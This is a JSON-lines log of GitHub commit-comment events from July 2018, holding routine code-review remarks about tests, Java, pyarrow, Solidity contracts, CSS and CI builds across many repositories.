{"id":"7981651763","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"AndrewJCallow/Splitter"},"payload":{"comment":{"id":29746391,"position":14,"line":13,"path":"test/tests.js","commit_id":"536b010e5f251f7262d2ec4bb1f317704c34876b","created_at":"2018-07-18T09:12:47Z","updated_at":"2018-07-18T09:12:47Z","author_association":"NONE","body":"This sounds more like a `before` because you are testing the setup conditions."}},"created_at":"2018-07-18T09:12:47Z"}
{"id":"7981656242","type":"CommitCommentEvent","actor":{"login":"edouardhue"},"repo":{"name":"edouardhue/java-http-fluent"},"payload":{"comment":{"id":29746402,"position":4,"line":636,"path":"src/main/java/in/yuvi/http/fluent/Http.java","commit_id":"be5ed443c6a11b6323d5c462844ec29225d78279","created_at":"2018-07-18T09:13:35Z","updated_at":"2018-07-18T09:13:35Z","author_association":"OWNER","body":"Target Java version is 1.5 (see compiler-plugin configuration in pom.xml). In Java 1.5, @Override applied only to subclasses and should not have been used in interfaces implementors."}},"created_at":"2018-07-18T09:13:35Z"}
{"id":"7981657578","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"AndrewJCallow/Splitter"},"payload":{"comment":{"id":29746404,"position":26,"line":22,"path":"test/tests.js","commit_id":"536b010e5f251f7262d2ec4bb1f317704c34876b","created_at":"2018-07-18T09:13:50Z","updated_at":"2018-07-18T09:13:50Z","author_association":"NONE","body":"Why would you make an ugly sync' call to get accounts when they were already given to you line 11?"}},"created_at":"2018-07-18T09:13:50Z"}
{"id":"7981657745","type":"CommitCommentEvent","actor":{"login":"pitrou"},"repo":{"name":"apache/arrow"},"payload":{"comment":{"id":29746405,"position":60,"line":467,"path":"python/pyarrow/scalar.pxi","commit_id":"dc80a768c0a15e62998ccd32d8353d2035302cb6","created_at":"2018-07-18T09:13:52Z","updated_at":"2018-07-18T09:13:52Z","author_association":"CONTRIBUTOR","body":"The dict lookup already existed before. The only possible difference is that we're now calling `klass.__new__` explicitly (perhaps going through the regular Python method call path)."}},"created_at":"2018-07-18T09:13:52Z"}
{"id":"7981658010","type":"CommitCommentEvent","actor":{"login":"alexanderturuta"},"repo":{"name":"Yulya98/JSTaskStLab"},"payload":{"comment":{"id":29746406,"position":1,"line":1,"path":"Scripts/Task_7_7+(ES_2015).js","commit_id":"b75bd3dddd7d001799581600be0f958c5a2e6ce8","created_at":"2018-07-18T09:13:55Z","updated_at":"2018-07-18T09:13:55Z","author_association":"NONE","body":"html demo version should be for each versions of JS"}},"created_at":"2018-07-18T09:13:55Z"}
{"id":"7981658610","type":"CommitCommentEvent","actor":{"login":"mbaldessari"},"repo":{"name":"mbaldessari/puppet-memcached"},"payload":{"comment":{"id":29746409,"position":null,"line":null,"path":null,"commit_id":"4aaa6feeacc14e70acc353c0c081189410f597e4","created_at":"2018-07-18T09:14:02Z","updated_at":"2018-07-18T09:14:02Z","author_association":"OWNER","body":"Yeah I fixed the typo in the proper PR https://github.com/saz/puppet-memcached/pull/99\r\n\r\nLet me check what the story with the test is and get back to you. Thanks!"}},"created_at":"2018-07-18T09:14:02Z"}
{"id":"7981658637","type":"CommitCommentEvent","actor":{"login":"afc163"},"repo":{"name":"ant-design/ant-design"},"payload":{"comment":{"id":29746410,"position":null,"line":null,"path":null,"commit_id":"705e57f7e8f995d550e2290ea7a24b2d7f302b34","created_at":"2018-07-18T09:14:02Z","updated_at":"2018-07-18T09:14:02Z","author_association":"MEMBER","body":"close #11304 #11307 #11335"}},"created_at":"2018-07-18T09:14:02Z"}
{"id":"7981660034","type":"CommitCommentEvent","actor":{"login":"bestDeveloper25"},"repo":{"name":"lpereira/lwan"},"payload":{"comment":{"id":29746417,"position":null,"line":null,"path":null,"commit_id":"2619fd343cce08b113dee7aa8be5ef6a0425fc94","created_at":"2018-07-18T09:14:17Z","updated_at":"2018-07-18T09:14:17Z","author_association":"NONE","body":"that is nice indentation. However you could add inline commenting so that we could jump right into a part of the code and see what it exactly does"}},"created_at":"2018-07-18T09:14:17Z"}
{"id":"7981661716","type":"CommitCommentEvent","actor":{"login":"vandlol"},"repo":{"name":"Finkregh/dotfiles"},"payload":{"comment":{"id":29746421,"position":162,"line":162,"path":".config/tmux/sensible.sh","commit_id":"5b83fc9a28f87d386dfd3b0c71af9c3e37204779","created_at":"2018-07-18T09:14:35Z","updated_at":"2018-07-18T09:14:35Z","author_association":"NONE","body":"urgs"}},"created_at":"2018-07-18T09:14:35Z"}
{"id":"7981662911","type":"CommitCommentEvent","actor":{"login":"yangxingli2001"},"repo":{"name":"tutu2011/myBlog.github.io"},"payload":{"comment":{"id":29746426,"position":null,"line":null,"path":null,"commit_id":"80804478f078530db4646c702a563751e6e128cf","created_at":"2018-07-18T09:14:49Z","updated_at":"2018-07-18T09:14:49Z","author_association":"CONTRIBUTOR","body":"我修改了一下产品的描述 #3 "}},"created_at":"2018-07-18T09:14:49Z"}
{"id":"7981663416","type":"CommitCommentEvent","actor":{"login":"pitrou"},"repo":{"name":"apache/arrow"},"payload":{"comment":{"id":29746429,"position":60,"line":467,"path":"python/pyarrow/scalar.pxi","commit_id":"dc80a768c0a15e62998ccd32d8353d2035302cb6","created_at":"2018-07-18T09:14:55Z","updated_at":"2018-07-18T09:14:55Z","author_association":"CONTRIBUTOR","body":"I wouldn't bother too much about it for now. The slowdown is certainly bearable (indexing array objects in Python is not recommended for high-performance code anyway). Perhaps open a JIRA about it?"}},"created_at":"2018-07-18T09:14:55Z"}
{"id":"7981665906","type":"CommitCommentEvent","actor":{"login":"Finkregh"},"repo":{"name":"Finkregh/dotfiles"},"payload":{"comment":{"id":29746443,"position":162,"line":162,"path":".config/tmux/sensible.sh","commit_id":"5b83fc9a28f87d386dfd3b0c71af9c3e37204779","created_at":"2018-07-18T09:15:24Z","updated_at":"2018-07-18T09:15:24Z","author_association":"OWNER","body":"yolo"}},"created_at":"2018-07-18T09:15:24Z"}
{"id":"7981666433","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"AndrewJCallow/Splitter"},"payload":{"comment":{"id":29746444,"position":20,"line":39,"path":"test/tests.js","commit_id":"a03dfd3ead3dc913fb6eb3e537116f244c5dd8bb","created_at":"2018-07-18T09:15:29Z","updated_at":"2018-07-18T09:15:29Z","author_association":"NONE","body":"My experience of mixing `Promise.all` and `web3` is not happy. So I created this little thing to sequentially the promises behind the scenes. https://gist.github.com/xavierlepretre/0e24b1dc300e5aaea20c87e3d3039d29"}},"created_at":"2018-07-18T09:15:29Z"}
{"id":"7981668792","type":"CommitCommentEvent","actor":{"login":"Hammer22"},"repo":{"name":"dmarcos/aframe-motion-capture-components"},"payload":{"comment":{"id":29746450,"position":3,"line":1,"path":"dist/aframe-motion-capture-components.min.js","commit_id":"cc06436ad28b1ff2d1e73004fc522e74da1970a8","created_at":"2018-07-18T09:15:55Z","updated_at":"2018-07-18T09:15:55Z","author_association":"NONE","body":"[PCLA ESign Version Version 11.pdf](https://github.com/dmarcos/aframe-motion-capture-components/files/2205172/PCLA.ESign.Version.Version.11.pdf)\r\n[Bluetooth SIG Code of Conduct_V1.0.pdf](https://github.com/dmarcos/aframe-motion-capture-components/files/2205173/Bluetooth.SIG.Code.of.Conduct_V1.0.pdf)\r\n"}},"created_at":"2018-07-18T09:15:55Z"}
{"id":"7981670269","type":"CommitCommentEvent","actor":{"login":"ivowillemsen"},"repo":{"name":"ivowillemsen/b9lab-rps"},"payload":{"comment":{"id":29746455,"position":209,"line":186,"path":"contracts/RockPaperScissors.sol","commit_id":"b85afd8baf463cc123fdc46f8ca0e351edcff46c","created_at":"2018-07-18T09:16:11Z","updated_at":"2018-07-18T09:16:11Z","author_association":"OWNER","body":"Good one, that's easier for the user and also less accounting"}},"created_at":"2018-07-18T09:16:11Z"}
{"id":"7981672660","type":"CommitCommentEvent","actor":{"login":"nicolas-raoul"},"repo":{"name":"edouardhue/java-http-fluent"},"payload":{"comment":{"id":29746458,"position":4,"line":636,"path":"src/main/java/in/yuvi/http/fluent/Http.java","commit_id":"be5ed443c6a11b6323d5c462844ec29225d78279","created_at":"2018-07-18T09:16:38Z","updated_at":"2018-07-18T09:16:38Z","author_association":"NONE","body":"Thanks :-)"}},"created_at":"2018-07-18T09:16:38Z"}
{"id":"7981673967","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"ivowillemsen/b9lab-rps"},"payload":{"comment":{"id":29746461,"position":209,"line":186,"path":"contracts/RockPaperScissors.sol","commit_id":"b85afd8baf463cc123fdc46f8ca0e351edcff46c","created_at":"2018-07-18T09:16:53Z","updated_at":"2018-07-18T09:16:53Z","author_association":"NONE","body":"I want to see in which position you are going to place this `.add`."}},"created_at":"2018-07-18T09:16:53Z"}
{"id":"7981674901","type":"CommitCommentEvent","actor":{"login":"kszucs"},"repo":{"name":"apache/arrow"},"payload":{"comment":{"id":29746464,"position":60,"line":467,"path":"python/pyarrow/scalar.pxi","commit_id":"dc80a768c0a15e62998ccd32d8353d2035302cb6","created_at":"2018-07-18T09:17:03Z","updated_at":"2018-07-18T09:17:03Z","author_association":"CONTRIBUTOR","body":"I suspect the same, with explicit classnames cython would probably compile away `klass.__new__`."}},"created_at":"2018-07-18T09:17:03Z"}
{"id":"7981675445","type":"CommitCommentEvent","actor":{"login":"alexanderturuta"},"repo":{"name":"Yulya98/JSTaskStLab"},"payload":{"comment":{"id":29746468,"position":8,"line":6,"path":"Scripts/Task_7_7+.js","commit_id":"377705a72313651dd9cb8f6d0743755abd7616a5","created_at":"2018-07-18T09:17:09Z","updated_at":"2018-07-18T09:17:09Z","author_association":"NONE","body":"why don't you use classes?"}},"created_at":"2018-07-18T09:17:09Z"}
{"id":"7981680828","type":"CommitCommentEvent","actor":{"login":"donnerpeter"},"repo":{"name":"JetBrains/intellij-community"},"payload":{"comment":{"id":29746476,"position":12,"line":37,"path":"java/openapi/src/com/intellij/codeInsight/NullableNotNullDialog.java","commit_id":"1bd3a97d1f3731aa0f267b6d2c828a41c986c6a5","created_at":"2018-07-18T09:18:10Z","updated_at":"2018-07-18T09:18:10Z","author_association":"CONTRIBUTOR","body":"Thanks for noticing! No, it's not intended, I have to find a more orthodox header renderer."}},"created_at":"2018-07-18T09:18:10Z"}
{"id":"7981681031","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"ivowillemsen/b9lab-rps"},"payload":{"comment":{"id":29746477,"position":285,"line":246,"path":"contracts/RockPaperScissors.sol","commit_id":"b85afd8baf463cc123fdc46f8ca0e351edcff46c","created_at":"2018-07-18T09:18:13Z","updated_at":"2018-07-18T09:18:13Z","author_association":"NONE","body":"Wait, has my comment about \"No, inviter should not be allowed to cancel\" disappeared??"}},"created_at":"2018-07-18T09:18:13Z"}
{"id":"7981681461","type":"CommitCommentEvent","actor":{"login":"ivowillemsen"},"repo":{"name":"ivowillemsen/b9lab-rps"},"payload":{"comment":{"id":29746479,"position":70,"line":80,"path":"contracts/RockPaperScissors.sol","commit_id":"b85afd8baf463cc123fdc46f8ca0e351edcff46c","created_at":"2018-07-18T09:18:18Z","updated_at":"2018-07-18T09:18:18Z","author_association":"OWNER","body":"actually did that, forgot to commit"}},"created_at":"2018-07-18T09:18:18Z"}
{"id":"7981682151","type":"CommitCommentEvent","actor":{"login":"NazarShershen"},"repo":{"name":"Julia-69/PSD-to-HTML"},"payload":{"comment":{"id":29746481,"position":11,"line":11,"path":"index.html","commit_id":"1226edeac51898905829e8208133dca702ffaa08","created_at":"2018-07-18T09:18:25Z","updated_at":"2018-07-18T09:18:25Z","author_association":"NONE","body":"hader завеликий. В хедері зазвичай логотип і навігація, все решта це вже не хедер."}},"created_at":"2018-07-18T09:18:25Z"}
{"id":"7981684457","type":"CommitCommentEvent","actor":{"login":"alexanderturuta"},"repo":{"name":"Yulya98/JSTaskStLab"},"payload":{"comment":{"id":29746484,"position":2,"line":2,"path":"Scripts/Task_7_7+(ES_2015).js","commit_id":"b75bd3dddd7d001799581600be0f958c5a2e6ce8","created_at":"2018-07-18T09:18:51Z","updated_at":"2018-07-18T09:18:51Z","author_association":"NONE","body":"existing demo is not working for now"}},"created_at":"2018-07-18T09:18:51Z"}
{"id":"7981686605","type":"CommitCommentEvent","actor":{"login":"Djuliuss"},"repo":{"name":"Djuliuss/Remittance"},"payload":{"comment":{"id":29746486,"position":79,"line":61,"path":"contracts/Remittance.sol","commit_id":"e572e9501219ab51a52d241092544c6610b6c9ae","created_at":"2018-07-18T09:19:17Z","updated_at":"2018-07-18T09:19:17Z","author_association":"OWNER","body":"But if I was to use this function , then I'd need to send the password in plain format , wouldn't I ? The transaction could get picked up by someone?\r\nThat is something that has been bugging me all the time. Even with my current implementation , I need to do exactly that (send the password in plain format) when the exchange executes `processPayment` .  But I couldn't find a way to avoid this ... :-("}},"created_at":"2018-07-18T09:19:17Z"}
{"id":"7981687970","type":"CommitCommentEvent","actor":{"login":"edo9300"},"repo":{"name":"Fluorohydride/ygopro-core"},"payload":{"comment":{"id":29746489,"position":null,"line":null,"path":null,"commit_id":"861b5bcded25bf182b71bac16265da9ee2b89481","created_at":"2018-07-18T09:19:32Z","updated_at":"2018-07-18T09:19:32Z","author_association":"CONTRIBUTOR","body":"@mercury233 what of there's a card like \"if you summoned using an additional summon granted by an effect...\" Then you would need this function separate."}},"created_at":"2018-07-18T09:19:32Z"}
{"id":"7981691511","type":"CommitCommentEvent","actor":{"login":"mflorea"},"repo":{"name":"selectize/selectize.js"},"payload":{"comment":{"id":29746495,"position":4,"line":181,"path":"src/selectize.js","commit_id":"bbdde959beb26d019bc8005de21564ae025a1458","created_at":"2018-07-18T09:20:12Z","updated_at":"2018-07-18T09:20:12Z","author_association":"NONE","body":"If ``$input[0]`` is a ``select`` element with single selection then (at least on Firefox) the control input ends up with:\r\n\r\n    <input autocomplete=\"off\" type=\"select-one\" ... />\r\n\r\nIf the ``select`` element has multiple selection then the control input ends up with:\r\n\r\n    <input autocomplete=\"off\" type=\"select-multiple\" ... />\r\n\r\nThis is unexpected to say the least. I can't find these types on the list of [know input types](https://developer.mozilla.org/en-US/docs/Web/HTML/Element/input#Form_%3Cinput%3E_types). Any reason for this change?"}},"created_at":"2018-07-18T09:20:12Z"}
{"id":"7981692032","type":"CommitCommentEvent","actor":{"login":"liweidong32768"},"repo":{"name":"liweidong32768/springbootmybatis"},"payload":{"comment":{"id":29746498,"position":18,"line":18,"path":"readme","commit_id":"313acd92c36871a25e65a4935b57e98d440d55cc","created_at":"2018-07-18T09:20:17Z","updated_at":"2018-07-18T09:20:17Z","author_association":"OWNER","body":"如果你觉得这个帮到你了，欢迎start me "}},"created_at":"2018-07-18T09:20:17Z"}
{"id":"7981693624","type":"CommitCommentEvent","actor":{"login":"AnotherChen"},"repo":{"name":"jinfagang/tensorflow_poems"},"payload":{"comment":{"id":29746500,"position":null,"line":null,"path":null,"commit_id":"64ad0ac2963415edc3bfc7d66ff06b4a41f2fd8c","created_at":"2018-07-18T09:20:31Z","updated_at":"2018-07-18T09:20:31Z","author_association":"NONE","body":"你好，我训练完后输入时出现这样的错误：\r\nValueError: Variable embedding already exists, disallowed.\r\n\r\n请您解惑。"}},"created_at":"2018-07-18T09:20:31Z"}
{"id":"7981695282","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"Djuliuss/Remittance"},"payload":{"comment":{"id":29746501,"position":79,"line":61,"path":"contracts/Remittance.sol","commit_id":"e572e9501219ab51a52d241092544c6610b6c9ae","created_at":"2018-07-18T09:20:49Z","updated_at":"2018-07-18T09:20:49Z","author_association":"NONE","body":"I said \"make a public function to create something\". I did not say \"send a transaction to it\".\r\nWhat if this function was `pure`?"}},"created_at":"2018-07-18T09:20:49Z"}
{"id":"7981696328","type":"CommitCommentEvent","actor":{"login":"Djuliuss"},"repo":{"name":"Djuliuss/Remittance"},"payload":{"comment":{"id":29746505,"position":89,"line":70,"path":"contracts/Remittance.sol","commit_id":"e572e9501219ab51a52d241092544c6610b6c9ae","created_at":"2018-07-18T09:21:00Z","updated_at":"2018-07-18T09:21:00Z","author_association":"OWNER","body":"I understand, thank you."}},"created_at":"2018-07-18T09:21:00Z"}
{"id":"7981699849","type":"CommitCommentEvent","actor":{"login":"zentol"},"repo":{"name":"NicoK/flink"},"payload":{"comment":{"id":29746508,"position":76,"line":179,"path":"flink-runtime/src/main/java/org/apache/flink/runtime/rest/FileUploadHandler.java","commit_id":"c222a08f31959ac1b5e9cfe4cb67569283b90ec2","created_at":"2018-07-18T09:21:38Z","updated_at":"2018-07-18T09:21:38Z","author_association":"NONE","body":"this is never `true`."}},"created_at":"2018-07-18T09:21:38Z"}
{"id":"7981701166","type":"CommitCommentEvent","actor":{"login":"Nadahar"},"repo":{"name":"DigitalMediaServer/DigitalMediaServer"},"payload":{"comment":{"id":29746511,"position":3,"line":1390,"path":"src/main/java/net/pms/dlna/RootFolder.java","commit_id":"6870a7e12fd4f34991cdfd3d2c5d570536d8df9b","created_at":"2018-07-18T09:21:54Z","updated_at":"2018-07-18T09:21:54Z","author_association":"CONTRIBUTOR","body":"I've told you, it's \"copy / haste\" ;P"}},"created_at":"2018-07-18T09:21:54Z"}
{"id":"7981704793","type":"CommitCommentEvent","actor":{"login":"NazarShershen"},"repo":{"name":"Julia-69/PSD-to-HTML"},"payload":{"comment":{"id":29746513,"position":20,"line":20,"path":"index.html","commit_id":"1226edeac51898905829e8208133dca702ffaa08","created_at":"2018-07-18T09:22:32Z","updated_at":"2018-07-18T09:22:32Z","author_association":"NONE","body":"Цей пайп треба було б зробити стилями, а то виходить клікабельна риска, яка нічого не робить.\r\nМожна використати :nth-of-type і :after чи :before"}},"created_at":"2018-07-18T09:22:32Z"}
{"id":"7981707325","type":"CommitCommentEvent","actor":{"login":"woshinilaozi"},"repo":{"name":"woshinilaozi/woshinige"},"payload":{"comment":{"id":29746519,"position":null,"line":null,"path":null,"commit_id":"6470ab26cef36b90f39e5f9d4907b00510f98b7d","created_at":"2018-07-18T09:23:00Z","updated_at":"2018-07-18T09:23:00Z","author_association":"OWNER","body":"afafasd a"}},"created_at":"2018-07-18T09:23:00Z"}
{"id":"7981742114","type":"CommitCommentEvent","actor":{"login":"kszucs"},"repo":{"name":"apache/arrow"},"payload":{"comment":{"id":29746577,"position":60,"line":467,"path":"python/pyarrow/scalar.pxi","commit_id":"dc80a768c0a15e62998ccd32d8353d2035302cb6","created_at":"2018-07-18T09:29:17Z","updated_at":"2018-07-18T09:29:17Z","author_association":"CONTRIBUTOR","body":"Hopefully with the packaging automation We can ship micro optimizations with minor releases more easily.\r\n\r\nCreated jira ticket: https://issues.apache.org/jira/browse/ARROW-2873"}},"created_at":"2018-07-18T09:29:17Z"}
{"id":"7981750395","type":"CommitCommentEvent","actor":{"login":"nkarre"},"repo":{"name":"billybichon/liveGQL"},"payload":{"comment":{"id":29746585,"position":null,"line":null,"path":null,"commit_id":"42154b200727e70a7556e3ca89b217407d9b1a70","created_at":"2018-07-18T09:30:46Z","updated_at":"2018-07-18T09:30:46Z","author_association":"NONE","body":"Thank you for your response, I have liveGQL object with LiveGQLListener then calling liveGQL.subscribe. \r\nI am looking for the syntax for query to pass in liveGQL.subscribe(\"?\", \"tag\").\r\n\r\nif you can share any sample it will help me. \r\n\r\n"}},"created_at":"2018-07-18T09:30:46Z"}
{"id":"7981754559","type":"CommitCommentEvent","actor":{"login":"MichaIng"},"repo":{"name":"Fourdee/DietPi"},"payload":{"comment":{"id":29746604,"position":21,"line":73,"path":"dietpi/dietpi-ramlog","commit_id":"e85f2efa39bd7d3867f06a804149c47c45c3170e","created_at":"2018-07-18T09:31:32Z","updated_at":"2018-07-18T09:31:32Z","author_association":"COLLABORATOR","body":"@Fourdee \r\n`cp -R -p --attributes-only /var/log/. $FILEPATH_DIETPI_RAMLOG_SAVE/` (with dot instead of star) pre-creates the folder automatically, thus no `mkdir -p $FILEPATH_DIETPI_RAMLOG_SAVE` needed, or did it behave differently in your case?\r\n\r\nBut mkdir doesn't hurt as well 👍."}},"created_at":"2018-07-18T09:31:32Z"}
{"id":"7981756978","type":"CommitCommentEvent","actor":{"login":"BearishSun"},"repo":{"name":"GameFoundry/bsf"},"payload":{"comment":{"id":29746610,"position":9,"line":204,"path":"Source/Foundation/bsfCore/Profiling/BsProfilerGPU.h","commit_id":"09c75b43855dba8fc2c338226309ed07f32155fc","created_at":"2018-07-18T09:31:58Z","updated_at":"2018-07-18T09:31:58Z","author_association":"CONTRIBUTOR","body":"I think it's just an error, it shouldn't be `= default`."}},"created_at":"2018-07-18T09:31:58Z"}
{"id":"7981757700","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"Djuliuss/Remittance"},"payload":{"comment":{"id":29746612,"position":17,"line":40,"path":"test/Remittance.js","commit_id":"51d066f79cc71928bc9afeb541c818de0c4bd6db","created_at":"2018-07-18T09:32:07Z","updated_at":"2018-07-18T09:32:07Z","author_association":"NONE","body":"To be very strict, you should also test for `txObj.logs` before assuming below that `logs[0]` exists."}},"created_at":"2018-07-18T09:32:07Z"}
{"id":"7981763277","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"Djuliuss/Remittance"},"payload":{"comment":{"id":29746637,"position":29,"line":61,"path":"test/Remittance.js","commit_id":"51d066f79cc71928bc9afeb541c818de0c4bd6db","created_at":"2018-07-18T09:33:05Z","updated_at":"2018-07-18T09:33:05Z","author_association":"NONE","body":"This function could also take care of fetching the `tx` actually."}},"created_at":"2018-07-18T09:33:05Z"}
{"id":"7981766828","type":"CommitCommentEvent","actor":{"login":"NazarShershen"},"repo":{"name":"Julia-69/PSD-to-HTML"},"payload":{"comment":{"id":29746644,"position":11,"line":11,"path":"index.html","commit_id":"1226edeac51898905829e8208133dca702ffaa08","created_at":"2018-07-18T09:33:44Z","updated_at":"2018-07-18T09:33:44Z","author_association":"NONE","body":"І перша секція мала б бути на всю висоту екрану\r\n\r\nhttps://www.w3schools.com/cssref/css_units.asp"}},"created_at":"2018-07-18T09:33:44Z"}
{"id":"7981773926","type":"CommitCommentEvent","actor":{"login":"dbmbeijing"},"repo":{"name":"dbmbeijing/2019ceshi"},"payload":{"comment":{"id":29746679,"position":4,"line":23,"path":"1.weak 的底层实现原理.txt","commit_id":"8142ca69a003cded4b540a80e0f6feadea74927e","created_at":"2018-07-18T09:35:03Z","updated_at":"2018-07-18T09:35:03Z","author_association":"OWNER","body":"这个是什么情况\r\n"}},"created_at":"2018-07-18T09:35:03Z"}
{"id":"7981774297","type":"CommitCommentEvent","actor":{"login":"nabijaczleweli"},"repo":{"name":"Enet4/byteorder-runtime"},"payload":{"comment":{"id":29746681,"position":102,"line":102,"path":"src/lib.rs","commit_id":"d1530b9f3cfbfbca3086e054420fdfa426c6f354","created_at":"2018-07-18T09:35:08Z","updated_at":"2018-07-18T09:35:08Z","author_association":"NONE","body":"Whya feature instead of a [capability check](https://github.com/nabijaczleweli/safe-transmute-rs/blob/master/src/pod.rs#L41) – `#[cfg(i128_type)]`?"}},"created_at":"2018-07-18T09:35:08Z"}
{"id":"7981774311","type":"CommitCommentEvent","actor":{"login":"Sugantha-Priyadharshini"},"repo":{"name":"Sugantha-Priyadharshini/demo-rep"},"payload":{"comment":{"id":29746682,"position":null,"line":null,"path":null,"commit_id":"50e9df8a6ca1631cc13d93f0744552b1ad25976b","created_at":"2018-07-18T09:35:08Z","updated_at":"2018-07-18T09:35:08Z","author_association":"OWNER","body":"addition"}},"created_at":"2018-07-18T09:35:08Z"}
{"id":"7981777606","type":"CommitCommentEvent","actor":{"login":"NicoK"},"repo":{"name":"NicoK/flink"},"payload":{"comment":{"id":29746686,"position":76,"line":179,"path":"flink-runtime/src/main/java/org/apache/flink/runtime/rest/FileUploadHandler.java","commit_id":"c222a08f31959ac1b5e9cfe4cb67569283b90ec2","created_at":"2018-07-18T09:35:44Z","updated_at":"2018-07-18T09:35:44Z","author_association":"OWNER","body":"true - after noticing, I felt like keeping it nonetheless to make it more explicit in case this function is used in a different context in the future. Or should I remove it?"}},"created_at":"2018-07-18T09:35:44Z"}
{"id":"7981791390","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimEssentials"},"payload":{"comment":{"id":29746722,"position":null,"line":null,"path":null,"commit_id":"b57b93fac19107c1893ac233ce845745cb5d1ab5","created_at":"2018-07-18T09:38:08Z","updated_at":"2018-07-18T09:38:08Z","author_association":"NONE","body":"TeamCity Xbim :: Xbim Essentials :: XbimEssentials [Build 152](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1926&buildTypeId=XbimEssentials_XbimEssentials) is now running\n"}},"created_at":"2018-07-18T09:38:08Z"}
{"id":"7981791539","type":"CommitCommentEvent","actor":{"login":"suganya-shanker"},"repo":{"name":"suganya-shanker/setmoreapi"},"payload":{"comment":{"id":29746723,"position":null,"line":null,"path":null,"commit_id":"e94499e79c8c05ae072f2e98aeec03a7d79c7fdb","created_at":"2018-07-18T09:38:10Z","updated_at":"2018-07-18T09:38:10Z","author_association":"OWNER","body":"center position\r\n\t.column{\r\n\t\twidth: 100px;\r\n\t\tfloat:left;\r\n\t\tpadding: 3px;\r\n\t\tmargin: 1px;\r\nheight: 200px;\r\n\t}\r\n\t.centered {\r\n  position:  absolute;\r\n  top: 20%;\r\n  left: 30%;\r\n}"}},"created_at":"2018-07-18T09:38:10Z"}
{"id":"7981799693","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimEssentials"},"payload":{"comment":{"id":29746746,"position":null,"line":null,"path":null,"commit_id":"b57b93fac19107c1893ac233ce845745cb5d1ab5","created_at":"2018-07-18T09:39:40Z","updated_at":"2018-07-18T09:39:40Z","author_association":"NONE","body":"TeamCity Xbim :: Xbim Essentials :: XbimEssentials [Build 152](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1926&buildTypeId=XbimEssentials_XbimEssentials) outcome was **SUCCESS**\nSummary: Running Build time: 00:01:31"}},"created_at":"2018-07-18T09:39:40Z"}
{"id":"7981803883","type":"CommitCommentEvent","actor":{"login":"mlschroe"},"repo":{"name":"openSUSE/libsolv"},"payload":{"comment":{"id":29746762,"position":null,"line":null,"path":null,"commit_id":"75d03059cdaf7770d2217fafaba6af732cd860ba","created_at":"2018-07-18T09:40:28Z","updated_at":"2018-07-18T09:40:28Z","author_association":"MEMBER","body":"It only compares chksum_len(3) bytes, so it should work."}},"created_at":"2018-07-18T09:40:28Z"}
{"id":"7981807254","type":"CommitCommentEvent","actor":{"login":"TangYanXia"},"repo":{"name":"whl726/IntelliJ-IDEA-Tutorial"},"payload":{"comment":{"id":29746770,"position":4,"line":8,"path":"hotkey-alt-enter-introduce.md","commit_id":"c4e5c21d08695560a707da74fd49559699cbfe6d","created_at":"2018-07-18T09:41:05Z","updated_at":"2018-07-18T09:41:05Z","author_association":"NONE","body":"e"}},"created_at":"2018-07-18T09:41:05Z"}
{"id":"7981807972","type":"CommitCommentEvent","actor":{"login":"Darkyenus"},"repo":{"name":"libgdx/libgdx"},"payload":{"comment":{"id":29746777,"position":26,"line":248,"path":"extensions/gdx-tools/src/com/badlogic/gdx/tools/texturepacker/MaxRectsPacker.java","commit_id":"59c37a0ab66dcb938d1a266158e4e0d4929e575e","created_at":"2018-07-18T09:41:13Z","updated_at":"2018-07-18T09:41:13Z","author_association":"CONTRIBUTOR","body":"Leftover main()?"}},"created_at":"2018-07-18T09:41:13Z"}
{"id":"7981809409","type":"CommitCommentEvent","actor":{"login":"BearishSun"},"repo":{"name":"GameFoundry/bsf"},"payload":{"comment":{"id":29746786,"position":162,"line":388,"path":"Source/Foundation/bsfCore/Animation/BsAnimationCurve.cpp","commit_id":"09c75b43855dba8fc2c338226309ed07f32155fc","created_at":"2018-07-18T09:41:30Z","updated_at":"2018-07-18T09:41:30Z","author_association":"CONTRIBUTOR","body":"Thanks, it's a neat trick. I should have probably just used `std::array` though."}},"created_at":"2018-07-18T09:41:30Z"}
{"id":"7981810562","type":"CommitCommentEvent","actor":{"login":"Flyingmana"},"repo":{"name":"OpenMage/magento-lts"},"payload":{"comment":{"id":29746790,"position":null,"line":null,"path":null,"commit_id":"afc58e89714d5ec3c7a24b4af571bc3d4d66f0e3","created_at":"2018-07-18T09:41:43Z","updated_at":"2018-07-18T09:41:43Z","author_association":"MEMBER","body":"starting at the end.\r\nThe 13 Commits would not be now in the history, if the merges were done as merges. Also I was doing the merge of 1.9.3.8 with the \"ours\" strategy, so none of this merged commits are affecting the branch. (as can be seen on https://github.com/OpenMage/magento-lts/commit/349f8bfa9e4c7325c6bb5d9820c7e44db7bbfe9d in comparison to this merge commit we comment on )\r\n\r\nIf Users are negative affected by this way of merging, I prefer to chose the \"you did not pay for it in the beginning\" card. Also nobody else was willing to invest time into this in a timeframe of over two weeks.\r\n"}},"created_at":"2018-07-18T09:41:43Z"}
{"id":"7981810658","type":"CommitCommentEvent","actor":{"login":"vanhauser-thc"},"repo":{"name":"wmkhoo/taintgrind"},"payload":{"comment":{"id":29746791,"position":null,"line":null,"path":null,"commit_id":"6f55ff9fc19329790ef3b59e5756e04dfad68fb6","created_at":"2018-07-18T09:41:44Z","updated_at":"2018-07-18T09:41:44Z","author_association":"NONE","body":"this sounds very useful, will try it :)\r\n"}},"created_at":"2018-07-18T09:41:44Z"}
